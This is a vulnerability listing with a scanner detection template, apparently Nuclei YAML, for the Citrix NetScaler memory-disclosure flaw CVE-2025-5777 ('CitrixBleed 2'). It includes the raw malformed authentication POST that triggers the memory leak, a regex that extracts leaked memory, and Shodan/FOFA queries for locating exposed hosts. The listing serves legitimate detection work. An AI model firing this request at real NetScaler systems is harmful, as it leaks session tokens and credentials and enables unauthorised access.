Citrix NetScaler Memory Disclosure - CitrixBleed 2
CVE-2025-5777
Verified
Description
Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
Severity
Critical
Exploit Probability
77%
Published Date
July 5, 2025
Template Author
watchtowr, dhiyaneshdk, darses
CVE-2025-5777.yaml
id: CVE-2025-5777
info:
name: Citrix NetScaler Memory Disclosure - CitrixBleed 2
author: watchtowr,DhiyaneshDk,darses
severity: critical
description: |
Insufficient input validation leading to memory overread on the NetScaler Management Interface NetScaler ADC and NetScaler Gateway
impact: |
Unauthenticated attackers can trigger memory overread conditions to leak sensitive information from NetScaler memory, potentially exposing session tokens and credentials similar to CitrixBleed.
remediation: |
Apply the security patches as described in Citrix support article CTX693420 and restrict access to the NetScaler Management Interface.
reference:
- https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420
- https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
- https://nvd.nist.gov/vuln/detail/CVE-2025-5777
classification:
epss-score: 0.77205
epss-percentile: 0.98926
metadata:
verified: true
max-request: 1
shodan-query:
- title:"NetScaler Gateway"
- title:"NetScaler AAA"
- http.favicon.hash:-1166125415
- http.favicon.hash:-1292923998
fofa-query:
- title="NetScaler Gateway"
- title="NetScaler AAA"
- icon_hash="-1166125415"
- icon_hash="-1292923998"
tags: cve,cve2025,netscaler,citrix,exposure,kev,vkev,vuln
http:
- raw:
- |+
POST /p/u/doAuthentication.do HTTP/1.0
Host: {{Hostname}}
bleed_attack: {{iteration}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 5
login
unsafe: true
payloads:
iteration:
- "{{rand_int(1,5)}}"
extractors:
- type: regex
name: iv
part: body
group: 1
regex:
- '<InitialValue>([^<]{10,})</InitialValue>'
internal: true
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'len(iv) > 0'
- 'contains(to_lower(header), "application/vnd.citrix.authenticateresponse")'
- '!contains(body, "<InitialValue></InitialValue>")'
- '!contains(to_string(iv), "false")'
- '!contains(to_string(iv), "true")'
- '!regex("^[A-Za-z0-9+/=\\s]+$", iv)'
condition: and
# digest: 490a004630440220133e20414d07b44ee42a74e53afb2f9298273f3838abe29d6ab18bdcdfc7f6f702202891b10be33a3476f1c929ff6d83cb9ee70efa5ad5a1c5bdbe1b0d3bc882ed77:922c64590222798bb761d5b6d8e72950Remediation Steps
Apply the security patches as described in Citrix support article CTX693420 and restrict access to the NetScaler Management Interface.